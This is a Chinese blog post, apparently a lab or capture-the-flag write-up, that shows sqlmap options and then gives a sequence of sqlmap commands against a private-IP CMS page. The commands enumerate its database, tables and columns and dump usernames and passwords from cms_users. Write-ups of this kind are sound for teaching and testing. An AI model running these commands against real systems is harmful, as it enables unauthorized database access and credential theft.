Sql注入实验 二

Sql注入二 sqlmap工具的利用

我们看过这么多的道理,却仍旧过不好这一生。

  • sqlmap 我就不介绍了,大家应该都懂,不懂的你专业问题有点问题。

对于sqlmap的用法如果不会 可以help 一下

在这里插入图片描述

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

最常用的办法
我是win 系统

python sqlmap.py -u url

在这里插入图片描述

已知数据库为mysql,输入N,不需要在测试
在这里插入图片描述

后面的选项默认回车就可以了

存在多种注入,
在这里插入图片描述

获取当前数据库名

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 --current-db

在这里插入图片描述

这里就获取cms 数据库里的表

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 -D cms --tables

在这里插入图片描述

获取 cms_users 里面的内容

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 -D cms -T cms_users --columns

这里获取到了3个字段
在这里插入图片描述

最后一步对字段进行爆破

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 -D cms -T cms_users -C userid,username,password --dump

得到flag
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/Nocker888/article/details/103005680
今日推荐